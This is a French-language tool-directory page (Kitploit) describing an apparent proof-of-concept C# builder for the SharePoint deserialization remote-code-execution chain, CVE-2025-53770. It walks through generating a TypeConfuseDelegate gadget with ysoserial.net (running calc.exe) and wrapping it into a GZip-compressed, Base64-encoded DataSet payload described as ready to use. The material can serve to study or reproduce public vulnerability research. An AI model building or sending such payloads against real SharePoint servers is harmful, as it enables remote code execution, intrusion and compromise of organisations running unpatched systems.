Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SharePoint-CVE-2025-53770-POC — Outil C# qui génère une charge utile .NET DataSet compressée en GZip et encodée en Base64 à l'aide de LosFormatter pour reproduire la chaîne RCE par désérialisation de SharePoint (CVE-2025-53770). | Kitploit
Outils/GitHubGitHub/immersive-labs-sec/sharepoint-cve-2025-53770-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubimmersive-labs-sec/sharepoint-cve-2025-53770-poc

SharePoint-CVE-2025-53770-POC

Outil C# qui génère une charge utile .NET DataSet compressée en GZip et encodée en Base64 à l'aide de LosFormatter pour reproduire la chaîne RCE par désérialisation de SharePoint (CVE-2025-53770).

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
4il y a 1 anPas encore vérifié

OurSharePoint - CVE-2025-53770 (PoC)

Il s'agit d'un outil C# simple qui construit une charge utile .NET DataSet compressée en GZip et encodée en Base64, à l'aide d'une charge utile interne encodée avec LosFormatter. Il est conçu pour aider à reproduire la chaîne RCE par désérialisation de SharePoint décrite dans des recherches publiques.


Ce qu'il fait

Vous lui fournissez une charge utile encodée en Base64 (comme celle de ysoserial.net), et il :

  • L'enveloppe dans un DataSet .NET valide avec un schéma XML personnalisé + un diffgram
  • Sérialise le résultat à l'aide de BinaryFormatter
  • Compresse en GZip le blob sérialisé
  • Encode le résultat en Base64 et l'écrit dans un fichier .b64

Références

  • https://research.eye.security/sharepoint-under-siege/
  • https://github.com/rapid7/metasploit-framework/pull/20409/commits

Utilisation

Commencez par générer votre charge utile avec ysoserial.net :

root@kitploit:~
ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -o base64 -c "cmd /c calc.exe" > nested_gadget.b64

Exécutez ensuite cet outil :

root@kitploit:~
OurSharePointBuilder.exe --in=nested_gadget.b64 --out=exploit --a=<random> --b=<random> --c=<random>

Cela générera :

  • exploit.bin - un DataSet sérialisé brut
  • exploit.b64 - la charge utile finale compressée en GZip et encodée en Base64, prête à l'emploi

De plus, si vous ne spécifiez pas --a, --b ou --c, l'outil génère des noms aléatoires en minuscules.

Notes

root@kitploit:~
Cet outil ne valide ni n'inspecte la charge utile que vous lui fournissez.

Si vous testez localement et désérialisez manuellement, elle peut s'exécuter (par exemple, lancer calc).
Télécharger l’outil